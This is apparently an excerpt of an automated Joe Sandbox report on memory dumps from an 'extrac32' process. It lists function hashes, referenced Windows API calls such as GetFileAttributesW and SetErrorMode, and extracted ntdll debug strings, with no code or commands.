                                                                                                                                                                                                  • Opcode ID: adc3ee75b28c59b231303f47227c6a98418507a9b4357e94b7b136127dfd33c1
                                                                                                                                                                                                  • Instruction ID: 213f64135e774c308ff72d86e753f50a018924fdcab13bf8b7e9ca5489cd17b4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: adc3ee75b28c59b231303f47227c6a98418507a9b4357e94b7b136127dfd33c1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE065B6200304BBEA14EE99DC40FEB33ACEFC9710F004419FA08AB241C670B9108BB8
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetFileAttributesW.KERNELBASE(?), ref: 030C718C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                  • Opcode ID: 54e1f83b4bdf6646ec7db4c876b8ee570f52fb58b014e978d6284b0dc2a1929c
                                                                                                                                                                                                  • Instruction ID: 9c0d5a8207af24a18d66191a45ae37c53f8b1898cd5f9df011cafc118b66a9a0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e1f83b4bdf6646ec7db4c876b8ee570f52fb58b014e978d6284b0dc2a1929c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE020321503041BFB60DB7CDC45F69338C8B84A20F2C4664BD5CCB1C1D534F4424550
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,030C15EA,030C1D59,030D30C7,00000000), ref: 030C6FA3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                  • Opcode ID: 2e8a4c84d139f390e1968481b7f220de6230e0291b9f28f9a7a92cbe0a1b14c3
                                                                                                                                                                                                  • Instruction ID: 76204cad948dbe19345f2553a4614be87320ee19bd39b5e4963cd65e5d29c539
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e8a4c84d139f390e1968481b7f220de6230e0291b9f28f9a7a92cbe0a1b14c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64D05E752843043BFE90E6F5DC0AF9A368C9B84650F184464BA4CDB3C1ED55F40142A5
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                  • Opcode ID: cb9c9fdecd8fd6004f998503742ab594ddc5e48277e7057434dbb855dc4bb5e6
                                                                                                                                                                                                  • Instruction ID: 61d05f3852f92d8e8e8ef613ca9d6f777dc2df2c13386728879ee71904e18034
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb9c9fdecd8fd6004f998503742ab594ddc5e48277e7057434dbb855dc4bb5e6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7B092729024D5DAEB11EB604B4CB2B7A11BBD0701F66C4A6E2564681E8B3CC0A1F276
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ,ezr
                                                                                                                                                                                                  • API String ID: 0-3999745853
                                                                                                                                                                                                  • Opcode ID: 6364a6e8efe503923dca0b3e13c17e5037120d46b4ccd2e343dee7fce1e91a52
                                                                                                                                                                                                  • Instruction ID: 3edd8790fddcd2d8abdc1f360175c2707a6f6ed924ddd903547ed7eb535e097d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6364a6e8efe503923dca0b3e13c17e5037120d46b4ccd2e343dee7fce1e91a52
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72C02B97F000140696084E0D34C2030F7B1D28313BF3132DFCD0CB30012013C42004CD
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_30b0000_extrac32.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b161adfc8f678d21b06bba1625735aa95f7fbe57bb77e898fda9727621334fed
                                                                                                                                                                                                  • Instruction ID: 5b902dde8545cf942c420f3874edadab3f05700b950aa41265301d6220ac1fc5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b161adfc8f678d21b06bba1625735aa95f7fbe57bb77e898fda9727621334fed
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59119C2368A6C55BC321DF2C6C809F1FFB5DBC7A3170813DAE8508AA92D5228855C354
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • ExecuteOptions, xrefs: 051544AB
                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05154530
                                                                                                                                                                                                  • Execute=1, xrefs: 0515451E
                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0515454D
                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05154592
                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05154460
                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05154507
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                  • Opcode ID: b276d7342bf51dbb3244b7c77bb4ac55cd443c485ee3c0fc3402c207a4f20f70
                                                                                                                                                                                                  • Instruction ID: 46743dbd46ad69a865eb57fe6fa852148c400c53f37feb925da6312f7f76de70
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b276d7342bf51dbb3244b7c77bb4ac55cd443c485ee3c0fc3402c207a4f20f70
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851E931604219BAEF24EB94EC99FBD7769EF04310F0405F9E906A72C1EBB09A55CA54
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.16762252801.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.16762252801.00000000051DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_50b0000_extrac32.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: $$@
                                                                                                                                                                                                  • API String ID: 0-1194432280
                                                                                                                                                                                                  • Opcode ID: 0e4fba01c7acf17917f80d102d64198286c91ffb71d0e861c447b9c414fff139
                                                                                                                                                                                                  • Instruction ID: 393737f366bf1ac20a02387d6e69b9c550de261a0cc9769353420fdcd95c34a7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e4fba01c7acf17917f80d102d64198286c91ffb71d0e861c447b9c414fff139
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42814C71E012699FDB31CB54CC45BEEB6B8AF08710F1445EAEA19B7280D7709E84CFA0
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%